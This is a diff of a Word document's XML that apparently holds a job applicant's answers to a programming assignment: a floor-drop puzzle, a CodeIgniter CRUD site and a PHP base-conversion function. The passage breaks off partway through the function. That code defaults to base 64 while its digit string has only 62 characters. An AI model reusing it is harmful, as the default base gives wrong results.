--- a/Answers.docx
+++ b/Answers.docx
@@ -53,19 +53,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">1) You have been given 2 special, extremely rugged MacBook Pros. You are in an office building that is 100 stories high. Using the fewest possible number of drops from windows in your office building, determine the highest floor you can drop a MacBook Pro from and have it survive: for example, they might be able to take the drop from the 30th floor, but not the 31st. You can break both MacBook Pros in your search. State the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>worst-case</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> number of drops needed and explain how you arrived at that answer.</w:t>
+        <w:t>1) You have been given 2 special, extremely rugged MacBook Pros. You are in an office building that is 100 stories high. Using the fewest possible number of drops from windows in your office building, determine the highest floor you can drop a MacBook Pro from and have it survive: for example, they might be able to take the drop from the 30th floor, but not the 31st. You can break both MacBook Pros in your search. State the worst-case number of drops needed and explain how you arrived at that answer.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -93,15 +81,7 @@
           <w:b/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:b/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>. Answer:</w:t>
+        <w:t>1. Answer:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -127,6 +107,14 @@
         </w:rPr>
         <w:t>&gt;&gt;&gt;</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Can’t predict answer</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -161,35 +149,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">2) Create a simple account management website using PHP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>CodeIgniter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (http://ellislab.com/codeigniter) that allows a user to perform CRUD operations on it. An account consists of a person’s name, date of birth, and email. The application should be intuitive and user friendly. Feel free to use any external frameworks that you feel will help (e.g. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>jQuery</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>2) Create a simple account management website using PHP CodeIgniter (http://ellislab.com/codeigniter) that allows a user to perform CRUD operations on it. An account consists of a person’s name, date of birth, and email. The application should be intuitive and user friendly. Feel free to use any external frameworks that you feel will help (e.g. jQuery).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -217,15 +177,7 @@
           <w:b/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:b/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>. Answer:</w:t>
+        <w:t>2. Answer:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -304,81 +256,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">3) In a standalone web page (must </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>be able to double click on a file and open a browser), write a function that displays the string form of a value in a particular number base.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>function</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>integerToString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(value, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>numberBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>3) In a standalone web page (must be able to double click on a file and open a browser), write a function that displays the string form of a value in a particular number base.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>// function integerToString(value, numberBase)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -417,37 +319,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">Do not trivialize the task by using pre-existing JS functions to solve the crux of the question, for example, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>Number.toString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>numberBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>Do not trivialize the task by using pre-existing JS functions to solve the crux of the question, for example, Number.toString(numberBase).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -499,199 +371,61 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">I have written the function </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>integerToString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">value, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>numberBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Using below </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>url</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> you can run the function.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>I have written the function integerToString(value, numberBase). Using below url you can run the function.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
         <w:t>shopback</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>index.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>/home/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>integerToString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>/66870908998/62</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Here, the first parameter is 'value' </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>ie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>, 66870908998. The second parameter is '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>numberBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>ie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, 62. You can change the value and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>numberBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> by modifying of last two parameters in the above URL.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>/index.php/home/integerToString/66870908998/62</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>Here, the first parameter is 'value' ie, 66870908998. The second parameter is 'numberBase' ie, 62. You can change the value and numberBase by modifying of last two parameters in the above URL.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -707,49 +441,7 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">But </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>If</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> you don't mention any </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>numberBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> parameter, the function will take 64 as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>numberBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>. You can see my code below.</w:t>
+        <w:t>But If you don't mention any numberBase parameter, the function will take 64 as numberBase. You can see my code below.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -771,457 +463,213 @@
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>function</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>function integerToString($num, $b=64) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>integerToString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">  $base='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>num</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">  $r = $num  % $b ;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>, $b=64) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">  $res = $base[$r];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t xml:space="preserve">  $</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>base</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">  $q = floor($num/$b);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">  while ($q) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="1440"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t xml:space="preserve">  $</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">    $r = $q % $b;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="1440"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t xml:space="preserve"> = $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>num</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">    $q =floor($q/$b);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="1440"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t xml:space="preserve">  % $b ;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">    $res = $base[$r].$res;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t xml:space="preserve">  $</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>res</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">  }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t xml:space="preserve"> = $base[$r];</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:i/>
           <w:color w:val="4F81BD" w:themeColor="accent1"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  $</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>q</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = floor($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>num</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>/$b);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
